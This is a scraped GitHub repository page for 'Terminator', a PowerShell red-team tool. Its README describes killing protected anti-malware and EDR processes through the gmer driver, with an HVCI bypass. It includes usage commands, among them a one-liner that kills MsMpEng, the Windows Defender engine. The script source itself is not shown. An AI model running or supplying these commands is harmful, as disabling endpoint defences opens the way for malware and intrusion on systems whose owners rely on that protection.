Skip to content
/ Terminator Public

PowerShell script to terminate protected processes such as anti-malware and EDRs.

License

GPL-3.0 license
25 stars 6 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

xiosec/Terminator

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
assets
assets
 
 
driver
driver
 
 
Invoke-Terminator.ps1
Invoke-Terminator.ps1
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

Invoke-Terminator

xiosec - Terminator stars - Terminator forks - Terminator GitHub release License issues - Terminator

Terminator is a powershell script that terminates protected processes such as anti-malware and EDRs through the gmer driver.

  • in-memory
  • HVCI bypass

Usage

<#
----------------------------
        Terminator

github : github.com/xiosec
twitter: twitter.com/xiosec
----------------------------

* Arguments
    * -ServiceName
    * -ProcName
    * -ProcId
    * -driverPath
    * -AutoKill
#>

Invoke-Terminator -ServiceName terminator -ProcName MsMpEng

inline

powershell -c ". .\Invoke-Terminator.ps1; Invoke-Terminator -ProcName MsMpEng -AutoKill"

Example

In this example, we kill the MsMpEng process, which is related to the antimalware service. MsMpEng

Links

gmer64.sys

Blackout

License

Released under GPL-3.0 by @xiosec

About

PowerShell script to terminate protected processes such as anti-malware and EDRs.

Topics

in-memory bypass bypass-antivirus blueteam redteaming redteam win32-api redteam-tools hvci bypass-edr hvci-bypass gmer

Resources

Readme

License

GPL-3.0 license
Activity

Stars

25 stars

Watchers

1 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages